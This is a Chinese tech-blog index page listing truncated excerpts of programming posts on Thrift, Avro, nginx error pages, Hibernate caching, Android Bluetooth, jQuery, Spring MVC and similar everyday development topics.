  • HR看重的十大技能 bijian1013 提升能力HR成长
        一个人掌握何种技能取决于他的兴趣、能力和聪明程度,也取决于他所能支配的资源以及制定的事业目标,拥有过硬技能的人有更多的工作机会。但是,由于经济发展前景不确定,掌握对你的事业有所帮助的技能显得尤为重要。以下是最受雇主欢迎的十种技能。   一、解决问题的能力   每天,我们都要在生活和工作中解决一些综合性的问题。那些能够发现问题、解决问题并迅速作出有效决
  • 【Thrift一】Thrift编译安装 bit1129 thrift
    什么是Thrift The Apache Thrift software framework, for scalable cross-language services development, combines a software stack with a code generation engine to build services that work efficiently and s
  • 【Avro三】Hadoop MapReduce读写Avro文件 bit1129 mapreduce
    Avro是Doug Cutting(此人绝对是神一般的存在)牵头开发的。 开发之初就是围绕着完善Hadoop生态系统的数据处理而开展的(使用Avro作为Hadoop MapReduce需要处理数据序列化和反序列化的场景),因此Hadoop MapReduce集成Avro也就是自然而然的事情。 这个例子是一个简单的Hadoop MapReduce读取Avro格式的源文件进行计数统计,然后将计算结果
  • nginx定制500,502,503,504页面 ronin47 nginx 错误显示
    server { listen 80; error_page 500/500.html; error_page 502/502.html; error_page 503/503.html; error_page 504/504.html; location /test {return502;}} 配置很简单,和配
  • java-1.二叉查找树转为双向链表 bylijinnan 二叉查找树
    import java.util.ArrayList; import java.util.List; public class BSTreeToLinkedList { /* 把二元查找树转变成排序的双向链表 题目: 输入一棵二元查找树,将该二元查找树转换成一个排序的双向链表。 要求不能创建任何新的结点,只调整指针的指向。 10 / \ 6 14 / \
  • Netty源码学习-HTTP-tunnel bylijinnan javanetty
    Netty关于HTTP tunnel的说明: http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/socket/http/package-summary.html#package_description 这个说明有点太简略了 一个完整的例子在这里: https://github.com/bylijinnan
  • JSONUtil.serialize(map)和JSON.toJSONString(map)的区别 coder_xpf jqueryjsonmapval()
     JSONUtil.serialize(map)和JSON.toJSONString(map)的区别   数据库查询出来的map有一个字段为空   通过System.out.println()输出 JSONUtil.serialize(map): {"one":"1","two":"nul
  • Hibernate缓存总结 cuishikuan 开源sshjavawebhibernate缓存三大框架
    一、为什么要用Hibernate缓存? Hibernate是一个持久层框架,经常访问物理数据库。 为了降低应用程序对物理数据源访问的频次,从而提高应用程序的运行性能。 缓存内的数据是对物理数据源中的数据的复制,应用程序在运行时从缓存读写数据,在特定的时刻或事件会同步缓存和物理数据源的数据。   二、Hibernate缓存原理是怎样的? Hibernate缓存包括两大类:Hib
  • CentOs6 dalan_123 centos
    首先su - 切换到root下面1、首先要先安装GCC GCC-C++ Openssl等以来模块:yum -y install make gcc gcc-c++ kernel-devel m4 ncurses-devel openssl-devel2、再安装ncurses模块yum -y install ncurses-develyum install ncurses-devel3、下载Erang
  • 10款用 jquery 实现滚动条至页面底端自动加载数据效果 dcj3sjt126com JavaScript
      无限滚动自动翻页可以说是web2.0时代的一项堪称伟大的技术,它让我们在浏览页面的时候只需要把滚动条拉到网页底部就能自动显示下一页的结果,改变了一直以来只能通过点击下一页来翻页这种常规做法。 无限滚动自动翻页技术的鼻祖是微博的先驱:推特(twitter),后来必应图片搜索、谷歌图片搜索、google reader、箱包批发网等纷纷抄袭了这一项技术,于是靠滚动浏览器滚动条
  • ImageButton去边框&Button或者ImageButton的背景透明 dcj3sjt126com imagebutton
    在ImageButton中载入图片后,很多人会觉得有图片周围的白边会影响到美观,其实解决这个问题有两种方法 一种方法是将ImageButton的背景改为所需要的图片。如:android:background="@drawable/XXX" 第二种方法就是将ImageButton背景改为透明,这个方法更常用 在XML里;    <ImageBut
  • JSP之c:foreach eksliang jspforearch
    原文出自:http://www.cnblogs.com/draem0507/archive/2012/09/24/2699745.html <c:forEach>标签用于通用数据循环,它有以下属性 属 性 描 述 是否必须 缺省值 items 进行循环的项目 否 无 begin 开始条件 否 0 end 结束条件 否 集合中的最后一个项目 step 步长 否 1
  • Android实现主动连接蓝牙耳机 gqdy365 android
    在Android程序中可以实现自动扫描蓝牙、配对蓝牙、建立数据通道。蓝牙分不同类型,这篇文字只讨论如何与蓝牙耳机连接。 大致可以分三步: 一、扫描蓝牙设备: 1、注册并监听广播: BluetoothAdapter.ACTION_DISCOVERY_STARTED BluetoothDevice.ACTION_FOUND BluetoothAdapter.ACTION_DIS
  • android学习轨迹之四:org.json.JSONException: No value for hyz301 json
    org.json.JSONException: No value for items  在JSON解析中会遇到一种错误,很常见的错误   06-21 12:19:08.714 2098-2127/com.jikexueyuan.secret I/System.out﹕ Result:{"status":1,"page":1,&
  • 干货分享:从零开始学编程 系列汇总 justjavac 编程
    程序员总爱重新发明轮子,于是做了要给轮子汇总。 从零开始写个编译器吧系列 (知乎专栏) 从零开始写一个简单的操作系统 (伯乐在线) 从零开始写JavaScript框架 (图灵社区) 从零开始写jQuery框架 (蓝色理想 ) 从零开始nodejs系列文章 (粉丝日志) 从零开始编写网络游戏 
  • jquery-autocomplete 使用手册 macroli jqueryAjax脚本
    jquery-autocomplete学习 一、用前必备 官方网站:http://bassistance.de/jquery-plugins/jquery-plugin-autocomplete/ 当前版本:1.1 需要JQuery版本:1.2.6 二、使用 <script src="./jquery-1.3.2.js" type="text/ja
  • PLSQL-Developer或者Navicat等工具连接远程oracle数据库的详细配置以及数据库编码的修改 超声波 oracleplsql
      在服务器上将Oracle安装好之后接下来要做的就是通过本地机器来远程连接服务器端的oracle数据库,常用的客户端连接工具就是PLSQL-Developer或者Navicat这些工具了。刚开始也是各种报错,什么TNS:no listener;TNS:lost connection;TNS:target hosts...花了一天的时间终于让PLSQL-Developer和Navicat等这些客户
  • 数据仓库数据模型之:极限存储--历史拉链表 superlxw1234 极限存储数据仓库数据模型拉链历史表
    在数据仓库的数据模型设计过程中,经常会遇到这样的需求: 1. 数据量比较大; 2. 表中的部分字段会被update,如用户的地址,产品的描述信息,订单的状态等等; 3. 需要查看某一个时间点或者时间段的历史快照信息,比如,查看某一个订单在历史某一个时间点的状态,    比如,查看某一个用户在过去某一段时间内,更新过几次等等; 4. 变化的比例和频率不是很大,比如,总共有10
  • 10点睛Spring MVC4.1-全局异常处理 wiselyman spring mvc
    10.1 全局异常处理 使用@ControllerAdvice注解来实现全局异常处理; 使用@ControllerAdvice的属性缩小处理范围 10.2 演示 演示控制器 package com.wisely.web; import org.springframework.stereotype.Controller; import org.spring
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他